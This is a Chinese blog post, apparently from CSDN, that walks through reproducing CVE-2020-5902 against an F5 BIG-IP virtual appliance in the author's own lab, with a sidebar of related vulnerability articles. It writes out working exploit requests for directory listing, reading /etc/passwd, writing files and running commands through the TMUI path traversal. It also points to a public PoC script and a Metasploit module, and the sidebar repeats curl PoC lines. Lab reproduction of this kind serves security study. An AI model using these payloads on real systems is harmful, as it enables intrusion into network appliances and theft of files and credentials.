CVE-2020-5902:F5 BIG-IP 远程代码执行漏洞复现

最新推荐文章于 2021-01-09 22:29:10 发布
最新推荐文章于 2021-01-09 22:29:10 发布
阅读量624 收藏 1
点赞数
分类专栏: 中间件漏洞复现 文章标签: 安全漏洞 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/109412491
版权

声明

好好学习,天天向上

漏洞描述

BIG-IP F5,很熟悉,负载均衡,代理,请求转发,经常会用到

F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。

在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。

影响范围

BIG-IP 15.x: 15.1.0/15.0.0

BIG-IP 14.x: 14.1.0 ~ 14.1.2

BIG-IP 13.x: 13.1.0 ~ 13.1.3

BIG-IP 12.x: 12.1.0 ~ 12.1.5

BIG-IP 11.x: 11.6.1 ~ 11.6.5

复现过程

漏洞镜像需要自己去官网下载

https://downloads.f5.com/esd/ecc.sv?sw=BIG-IP&pro=big-ip_v15.x&ver=15.1.0&container=Virtual-Edition

先跳转到注册,填完邮箱后,会给邮箱里面发激活链接,收到后,访问链接,修改密码,然后再次访问上述链接,进行下载

在这里插入图片描述

在这里插入图片描述

下载好后,用虚机直接打开ova,一路下一步,然后启动

系统默认账户:root/default登录后需要修改默认密码,注意这里修改的密码也是你F5的管理端登录密码

修改完密码,需要查看用户,默认是自动获取IP的,输入ifconfig mgmt,查看获取的IP(我获取的是192.168.31.190),查看完后,浏览器输入

https://192.168.31.190/

在这里插入图片描述

目录遍历

浏览器访问

https://192.168.31.190/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/

在这里插入图片描述

任意文件读取

浏览器访问

https://192.168.31.190/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

在这里插入图片描述

文件上传与读取

发送请求,建议用BP,当然也可以浏览器,BP看的更直观一些,我这里展示浏览器的方式

浏览器访问第一行

POST提交第二行(其中fileName是文件名,content是文件内容)

https://192.168.31.190/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp
fileName=/tmp/CVE-2020-5902.txt&content=CVE-2020-5902

在这里插入图片描述

执行完后,我们就创建了一个/tmp/CVE-2020-5902.txt的文件,内容为CVE-2020-5902

访问查看

https://192.168.31.190/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/tmp/CVE-2020-5902.txt

在这里插入图片描述

命令执行(RCE)

浏览器访问,无法成功,试了15.0.0-0.0.39的虚拟也没复现成功,放弃

在将要放弃的时候,上网看了看,原来是需要登录的,登录F5管理页面后(F5强制要求修改密码,要求复杂度极高,改了好多个,连F5也要和我作对?),再次访问如下URL有一定几率会执行,有时候就是错误,所以要有耐心,复现这个小分体,我用了2个多小时才成功

https://192.168.31.190/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

在这里插入图片描述

github脚本

只需要修改这一个地方即可,修改完在python2的环境中执行

https://github.com/jas502n/CVE-2020-5902
python CVE-2020-5902.py

在这里插入图片描述

提示让你输入命令,多输入几个,什么whoami,ls,等等

在这里插入图片描述

msf

记得当时爆出这个漏洞时,msf更新exp也很快,6的一批

进入msf控制台

查看现有

查找F5相关

msfconsole
reload_all
search f5_bigip

没查到?没关系,msf还没更新,怎么更新漏洞库呢,我这里手动更新,其实msf都是调用一个个.rb

进入msf目录,可以看到这里有很多.rb结尾的文件,我们创建一个

cd /usr/share/metasploit-framework/modules/exploits/linux/http/

vim f5_bigip_tmui_rce.rb

把如下代码复制粘贴进去,OK

https://github.com/rapid7/metasploit-framework/blob/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb

在这里插入图片描述

好久没用msf了,让我回想一下

use exploit/linux/http/f5_bigip_tmui_rce

show options

设置完IP,run后也没成功,大佬们怎么设置参数成功的。。。

维梓-
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
F5 BIG-IP TMUI远程代码执行漏洞复现(CVE-2020-5902)
谢公子的博客
07-07 1989
F5 BIG-IP F5 BIG-IP Edge Gateway是一个接入解决方案,为远程用户提供了SSL VPN远程接入、安全性、应用加速和高可用性服务。 CVE-2020-5902 漏洞描述 2020年7月3日,未授权的远程攻击者通过向漏洞页面发送特制的请求包,可以造成任意Java代码执行。进而控制F5 BIG-IP的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等,该漏洞影响控制面板受影响,不影响数据面板。 漏洞危害等级 严重 影响版本 BIG-IP
CVE-2020-0601:微软核心加密库漏洞复现
xiaoguachong的博客
03-09 1744
CVE-2020-0601:微软核心加密库漏洞复现 一:漏洞介绍 受CVE2020-0601漏洞影响的系统,在验证证书签名时,在证书信用列表中查找受信任CA证书时出现乌龙。伪造的ECC CA证书可以被误认为可信任的证书,导致该伪造证书签名的文件能被系统信任。比如,win10中证书MicrosoftECCProductRootCertificateAuthority.pem是在受信任的证书列表中。现...
CVE-2020-5902 BIG-IP RCE漏洞复现&exp
Adminxe的博客
07-07 2391
0x01 漏洞简述 F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。 未授权的远程攻击者通过向该页面发送特制的请求包,可以造成任意Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。 0x02 漏洞详情 未授权的远程攻..
漏洞复现 | SaltStack认证绕过(CVE2020‐11651)
Ms08067安全实验室
11-16 290
本文作者:Birdman‐one(Ms08067实验室 SRSP TEAM小组成员)0x01 简介SaltStack是基于Python开发的一套C/S架构配置管理工具,是一个服务器基础架...
【补丁二次更新】CVE-2020-5902: F5 BIG-IP 远程代码执行漏洞通告更新
爱国小白帽
07-12 805
【补丁二次更新】CVE-2020-5902: F5 BIG-IP 远程代码执行漏洞通告更新 360-CERT [三六零CERT](javascript:void(0)???? 今天 0x00 更新细节 2020年07月11日,360CERT检测发现F5官方更新了漏洞缓解措施,之前的缓解措施可以仍可被绕过。本次更新,官方更新了针对攻击者利用hsqldb利用链,通过构造恶意请求,绕过官方发布的禁止请求中包含;的漏洞缓解方案,缓解措施更新如下: 编辑httpd组件的配置文件内容为: include ' <
漏洞复现 | CVE20205902踩坑记
Ms08067安全实验室
08-25 258
本文作者:Taoing(Ms08067实验室 SRSP TEAM小组成员) 0x0:漏洞概述F5 BIGIP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡...
CVE-2020-5902 F5 BIG-IP TMUI 远程代码执行漏洞.md
04-23
CVE-2020-5902 F5 BIG-IP TMUI 远程代码执行漏洞
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
CVE-2020-5902 BIG-IP RCE漏洞复现
weixin_44508748的博客
11-21 178
影响范围 版本号主要如下 11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x 文件读取poc curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileN
CVE-2020-5902: F5 BIG-IP 远程代码执行漏洞通告
爱国小白帽
07-04 3612
CVE-2020-5902: F5 BIG-IP 远程代码执行漏洞通告 360-CERT [三六零CERT](javascript:void(0)???? 今天 0x00 漏洞简述 2020年07月03日, 360CERT监测发现 F5 发布了 F5 BIG-IP 远程代码执行 的风险通告,该漏洞编号为 CVE-2020-5902漏洞等级:严重。 未授权的远程攻击者通过向漏洞页面发送特制的请求包,可以造成任意 Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令
CVE-2020-5902 F5 BIG-IP 远程代码执行RCE
weixin_41082546的博客
07-06 210
cve-2020-5902 : RCE: curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin' Read File: curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
CVE-2020-5902: F5 BIG-IP 远程代码执行漏洞分析
爱国小白帽
07-15 1290
360-CERT [三六零CERT](javascript:void(0)???? 昨天 0x00 漏洞简述 2020年07月08日, 360CERT监测发现 F5 官方更新了 F5 BIG-IP 远程代码执行 的风险通告,该漏洞编号为 CVE-2020-5902漏洞等级:严重。 未授权的远程攻击者通过向漏洞页面发送特制的请求包,可以造成任意 Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等,使用官方的httpd配置
【利用公开】CVE-2020-5902: F5 BIG-IP 远程代码执行漏洞通告
爱国小白帽
07-06 1688
【利用公开】CVE-2020-5902: F5 BIG-IP 远程代码执行漏洞通告 360-CERT [三六零CERT](javascript:void(0)???? 今天 0x00 漏洞简述 2020年07月03日, 360CERT监测发现 F5 发布了 F5 BIG-IP 远程代码执行 的风险通告,该漏洞编号为 CVE-2020-5902漏洞等级:严重。 未授权的远程攻击者通过向漏洞页面发送特制的请求包,可以造成任意 Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行
Ladon插件-CVE-2020-1472域控提权漏洞EXP
K8哥哥
09-16 1272
漏洞简述 2020年08月12日, 360CERT监测发现Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告,该漏洞编号为 CVE-2020-1472,漏洞等级:严重,漏洞评分:10分。 攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序。 影响版本 Windows Server 2008 R2 for x64-based Systems Service Pac
从目录遍历到RCE:对CVE-20205902的深入了解
知柯信安
01-09 477
CVE-2020-5902发布以来,互联网一直在嗡嗡作响,这是有充分理由的。由Mikhail Klyuchnikov发现的此漏洞是史诗级事件之一。不应通过公共IP空间访问流量管理用户界面(TMUI),但是在Shodan上进行的快速搜索将发现超过8,400个易受攻击的系统,并且此搜索中可能没有更多原因。 截至2020年7月4日,该漏洞 已被广泛发现并在野外被利用,使攻击者能够在易受攻击的系统上读取文件并执行代码。我本来打算为此发布概念证明,以便有时间让公司修补系统,但是由于概念证明今天似乎遍布Twitter
CVE-2020-14882​&14883:Weblogic RCE复现1
最新发布
08-03
声明:请勿用作违法用途,否则后果自负0x01 简介用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。0x02 漏洞概述编

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值